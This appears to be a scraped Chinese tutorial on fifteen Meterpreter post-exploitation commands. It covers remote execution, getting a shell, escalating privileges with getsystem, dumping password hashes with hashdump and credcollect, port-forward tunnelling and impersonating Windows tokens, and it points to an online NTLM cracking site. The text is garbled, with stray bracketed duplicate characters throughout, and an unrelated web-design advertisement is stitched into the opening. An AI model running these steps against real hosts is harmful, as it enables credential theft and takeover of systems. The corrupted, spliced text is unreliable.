meterpreter是一種高級、隱蔽、多層面的且可動態(tài)擴展的payload，可以將反射dll注入到目標主機的內(nèi)存中，還可以在運行時動態(tài)加載腳本和插件來進行后滲透利用。

成都做網(wǎng)站、網(wǎng)站設計介紹好的網(wǎng)站是理念、設計和技術的結合。成都創(chuàng)新互聯(lián)擁有的網(wǎng)站設計理念、多方位的設計風格、經(jīng)驗豐富的設計團隊。提供PC端+手機端網(wǎng)站建設，用營銷思維進行網(wǎng)站設計、采用先進技術開源代碼、注重用戶體驗與SEO基礎，將技術與創(chuàng)意整合到網(wǎng)站之中，以契合客戶的方式做到創(chuàng)意性的視覺化效果。

包括提權、轉(zhuǎn)存系統(tǒng)賬號、鍵盤記錄、持久后門服務、啟用遠程桌面等，還有很多其他的擴展。而且，meterpreter shell的整個通信都是默認加密的。

因為meterpreter提供的是一個全新的環(huán)境，所以我們本文來講解一些必備的meterpreter命令，帶你入門并且逐漸熟悉這款強大的工具。

[[247659]]

命令1：上傳文件到Windows主機

簡單來說，你可以上傳本機的任意文件到遠程目標主機中。

命令：

 
 
 
 

  
  
  
  
upload   
 
 
 
 

注意：使用-r參數(shù)可以遞歸上傳上傳目錄和文件

命令2：從windows主機下載文件

download命令可以下載遠程主機上的文件

命令：

 
 
 
 

  
  
  
  
download   
 
 
 
 

注意：Windows路徑要使用雙斜線

如果我們需要遞歸下載整個目錄包括子目錄和文件，我們可以使用download -r命令

命令3：在目標主機上執(zhí)行exe文件

我們也可以使用execute命令在目標主機上執(zhí)行應用程序

語法也非常簡單

命令：

 
 
 
 

  
  
  
  
execute -f  [options] 
 
 
 
 

命令4：創(chuàng)建CMD新通道

如果你想在目標主機上執(zhí)行命令提示符，你可以使用下列命令：

命令：

 
 
 
 

  
  
  
  
execute -f cmd -c 
 
 
 
 

命令5：顯示進程

ps命令會顯示目標主機上所有正在運行的進程

命令：

 
 
 
 

  
  
  
  
ps 
 
 
 
 

命令6：獲取目標主機的cmd shell

shell命令可以進入目標主機的cmd

命令：

 
 
 
 

  
  
  
  
shell 
 
 
 
 

命令7：獲取admin權限

getsystem命令可以提權到本地系統(tǒng)權限

命令：

 
 
 
 

  
  
  
  
getsystem 
 
 
 
 

命令8：使用Hashdump轉(zhuǎn)儲所有hash值

我們可以使用meterpreter shell來dump目標主機的當前系統(tǒng)賬戶和密碼。轉(zhuǎn)儲的內(nèi)容是NTML哈希格式，網(wǎng)上有很多工具和技巧來破解它們。

NTLM在線破解：https://hashkiller.co.uk/ntlm-decrypter.aspx

命令：

 
 
 
 

  
  
  
  
hashdump 
 
 
 
 

輸出的每一行內(nèi)容格式如下

 
 
 
 

  
  
  
  
Username:SID:LM hash:NTLM hash::: 
 
 
 
 

如圖所示

本次執(zhí)行輸出了5個用戶賬號，分別是Administrator,Guest,HelpAssistant,Owner and SUPPORT_388945a0

命令9：使用Credcollect轉(zhuǎn)儲hash值

還有一個類似的腳本叫credential_collector，也可以收集目標主機的tokens

命令：

 
 
 
 

  
  
  
  
run credcollect 
 
 
 
 

命令10：創(chuàng)建端口轉(zhuǎn)發(fā)

meterpreter shell中的portfwd命令是轉(zhuǎn)發(fā)技術中最常用的一個命令，可以讓攻擊系統(tǒng)訪問本來無法直接訪問的目標主機。

add選項會將端口轉(zhuǎn)發(fā)添加到列表中，而且本質(zhì)上會創(chuàng)建一個隧道。

請注意：這個隧道存在于meterpreter控制臺之外，任何終端會話都可以使用。

命令：

 
 
 
 

  
  
  
  
portfwd add -l  -r  
 
 
 
 

命令11：刪除端口轉(zhuǎn)發(fā)

跟創(chuàng)建端口轉(zhuǎn)發(fā)命令類似，這條命令是刪除一條端口轉(zhuǎn)發(fā)記錄

命令：

 
 
 
 

  
  
  
  
portfwd delete -l  -p  -r  
 
 
 
 

如果你想顯示所有端口轉(zhuǎn)發(fā)記錄，你可以使用portfwd list命令，如果你想刪除所有的記錄，可以使用portfwd flush命令

命令12：在目標主機上搜索文件

搜索命令可以來定位查找目標主機上的特定文件。這個命令可以搜索整個文件系統(tǒng)，也可以搜索特定的文件夾。

例如，如果你想搜索目標主機上的所有txt文件，可以使用下列命令：

命令：

 
 
 
 

  
  
  
  
search -f *.txt 
 
 
 
 

命令13：獲取用戶ID

getuid命令會顯示主機上運行meterpreter 服務的用戶

命令：

 
 
 
 

  
  
  
  
getuid 
 
 
 
 

命令14：獲取系統(tǒng)信息

sysinfo命令會顯示系統(tǒng)名，操作系統(tǒng)，架構和語言等。

命令：

 
 
 
 

  
  
  
  
sysinfo 
 
 
 
 

命令15：模擬任意用戶(token操作)

這個進程對于攻擊像微軟活動目錄這樣的分布式系統(tǒng)非常有幫助，因為在微軟活動目錄中，本地訪問權限并沒多大用，但是如果能搞到憑證尤其是管理員憑證，那就非常有用了。

incognito最開始是一個獨立的應用，當你成功入侵系統(tǒng)后可以用它來模擬用戶tokens。這個應用后來集成到了metasploit，并且最終集成到了meterpreter中，使用如下：

• 在meterpreter會話中加載這個模塊非常簡單，只要輸入 use incognito命令即可
• 輸入list_tokens -u來顯示所有有效的tokens
• 然后我們需要模擬某個token來獲取其權限。還有注意，如果成功模擬了一個token，我們可以使用getuid命令來檢查當前用戶ID

 
 
 
 

  
  
  
  
use incognito 
  
  
  
  
list_tokens -u 
  
  
  
  
impersonate_token “Machine\\user” 
 
 
 
 

網(wǎng)站欄目：meterpreter必知必會的15個命令
網(wǎng)站URL：http://uogjgqi.cn/article/dhdochg.html